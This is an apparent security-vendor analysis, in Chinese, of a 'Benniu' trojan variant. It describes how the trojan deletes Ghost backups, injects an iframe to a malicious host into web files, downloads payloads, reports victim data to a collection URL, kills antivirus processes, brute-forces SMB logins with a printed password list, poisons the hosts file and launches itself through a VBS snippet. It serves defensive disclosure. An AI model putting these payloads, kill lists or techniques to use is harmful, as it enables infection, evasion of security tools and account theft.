安全团队解析犇牛变种特征
犇牛是年初以来传播手段最综合的木马,传播手段与当年的“磁碟机”木马和“熊猫烧香”病毒类似,能把木马种子插入电脑中的所有html网页文件和rar压缩文件,具备了“全盘感染”的能力。
中了“犇牛”后,症状非常容易判断,特征有二:
1.电脑特别慢;
2.非系统盘下每个文件夹目录都多出来一个不正常的dll文件,经常会跳出“虚拟内存不足”的提示。用户重装系统或者用ghost系统还原都不能解决,除非全盘格式化。这是由于犇牛劫持了.dll文件,并删除了.gho镜像文件所致。
犇牛会在中招的电脑上划分势力范围,不让其它木马下载势力染指,这个不多见,由此可见木马行业内部竞争也日趋激烈。犇牛下载的木马很多都出自知名盗号工作室(五家以上),主要是网游盗号木马。
现在犇牛的制作团队正在跟安全厂商进行一场正面对抗。目前绝大部分杀毒软件都杀不干净或被强行关闭、卸载,这一点各安全厂商论坛上都有用户的求助信息。下面就给出犇牛变种的分析报告。
犇牛变种分析报告
1、遍历全盘中的Gho、GHO、gho文件,找到就删除。
2、遍历全盘中的 jsp、php、aspx、asp、htm、html文件,找到就向文件尾部插入
<iframe src="hxxp://derek.kalengzi.cn/a.htm" width=100 height=0></iframe>
进行网马传播。
3、通过 hxxp://down.skydows.cn/down.txt 这个下载列表,下载大量木马。
4、直接下载hxxp://w.ssddffgg.cn/me.exe,拷贝为c:\__default.pif,运行并进行自我更新。
5、向hxxp://w.ssddffgg.cn/7/get.asp发送本机信息,用来统计中招用户信息。
6、释放感染木马到c:\windows\ini目录下,并写入desktop.ini用来伪装成回收站。达到隐藏文件的目的。
7、遍历进行,发现下面的进程则尝试结束关闭:
rfwproxy.exe、rfwmain.exe、rfwsrv.exe、Navapsvc.exe、Navapw32.exe、 EGHOST.EXE、FileDsty.exe、RavTask.exe、RavMonD.exe、UlibCfg.exe、CCenter.exe、RavMon.exe、 RavLite.exe、Rav.exe、kasmain.exe、kissvc.exe、kavstart.exe、kwatch.exe、kav32.exe、 360Safe.exe、avp.exe、vptray.exe、mmsk.exe、THGUARD.EXE、TrojanHunter.exe、TBSCAN.EXE、 WEBSCANX.EXE、Iparmor.exe、PFW.exe、AST.exe、ast.exe、360tray.exe
8、遍历当前激活面板,如果面板父窗口含有以下关键字,则发送关闭消息关闭面板控件:
杀毒、worm、卡巴斯基、超级巡警、江民、离线升级包、金山、Anti、anti、Virus、virus、 Firewall、检测、Mcafee、病毒、查杀、狙剑、防火墙、主动防御、微点、防御、系统保护、绿鹰、 主动、杀马、木马、感染、清除器、上报、举 报、举报、瑞星、进 程、进程、低 安全、Process、 NOD32、拦截、监控、安全卫士、监视、专杀
9、写Autorun.inf进行U盘传播。
文件写入recycle.{645FF040-5081-101B-9F08-00AA002F954E}\ini.exe,且在该目录下建了一个“safe../"的畸形文件夹,用来防止删除recycle.{645FF040-5081-101B-9F08-00AA002F954E}目录。
10、调用Windows系统函数WNetAddConnection2A来连接其它主机的Windows文件共享和远程访问端口(445),一旦连接成功,使用以下密码字典(含空口令)尝试登录administrator账户:
movie、woaini、baby、asdf、NULL、angel、asdfgh、1314520、5201314、caonima、88888、bbbbbb、 12345678、memory、abc123、qwerty、123456、111、password、new、enter、hack、xpuser、money、 yeah、time、123456movie、game、user、alex、guest、admin、test、administrator、root、nn、 123、xp、love、home
如果登录成功,则向目标主机各共享文件夹下写入一个kav32.exe的自身拷贝。
11、向c:\windows\ini目录下写入wsock32.dll,并将该dll复制到硬盘的每一个目录下(系统的目录除外)。
12、向c:\windows\tasks目录下写入“安装.bat”,为插入压缩包作准备。
13、遍历所有目录下的tar、cab、tgz、zip、rar文件,并调用"%ProgramFiles%"目录下的\WinRAR\Rar.exe,使用命令行参数将c:\windows\tasks\安装.bat添加到这些压缩包中。
14、修改host表,屏蔽安全厂商网站:
# ****下面是恶意网站 127.0.0.0 360.qihoo.com 127.0.0.1 qihoo.com 127.0.0.1 www.qihoo.com 127.0.0.1 www.qihoo.cn 127.0.0.1 124.40.51.17 127.0.0.1 58.17.236.92',0 127.0.0.1 www.kaspersky.com 27.0.0.1 60.210.176.251 127.0.0.1 www.cnnod32.cn 127.0.0.1 www.lanniao.org 127.0.0.1 www.nod32club.com 127.0.0.1 www.dswlab.com 127.0.0.1 bbs.sucop.com 127.0.0.1 www.virustotal.com 127.0.0.1 tool.ikaka.com,0 127.0.0.1 www.jiangmin.com 203.208.37.99 www.duba.net 127.0.0.1 www.eset.com.cn 127.0.0.1 www.nod32.com 203.208.37.99 shadu.duba.net 203.208.37.99 union.kingsoft.com 127.0.0.1 www.kaspersky.com.cn 127.0.0.1 kaspersky.com.cn 127.0.0.1 virustotal.com,0 127.0.0.1 www.360.cn 127.0.0.1 www.360safe.cn 127.0.0.1 www.360safe.com 127.0.0.1 www.chinakv.com 127.0.0.1 www.rising.com.cn 127.0.0.1 rising.com.cn 127.0.0.1 dl.jiangmin.com 127.0.0.1 jiangmin.com,0
15、删除金山通行证的记录信息,达到破坏金山毒霸升级的目的。
c:\documents and settings\all users\application data\kingsoft\kis\log.dat c:\documents and settings\all users\application data\kingsoft\kis\user.dat
16、破坏安全模式及带网络的安全模式。
17、向%windir%\ini\目录下的shit.vbs写入如下内容:
On Error Resume NextSet rs=createObject("Wscript.shell")rs.run "%windir%\ini\ini.exe",0
并调用该VBS启动ini.exe。
18、查找AfxControlBar42s窗口类,用来关闭IceSword。
本文来源:360安全团队 作者:佚名
天下网吧·网吧天下
闽公网安备35010202000238号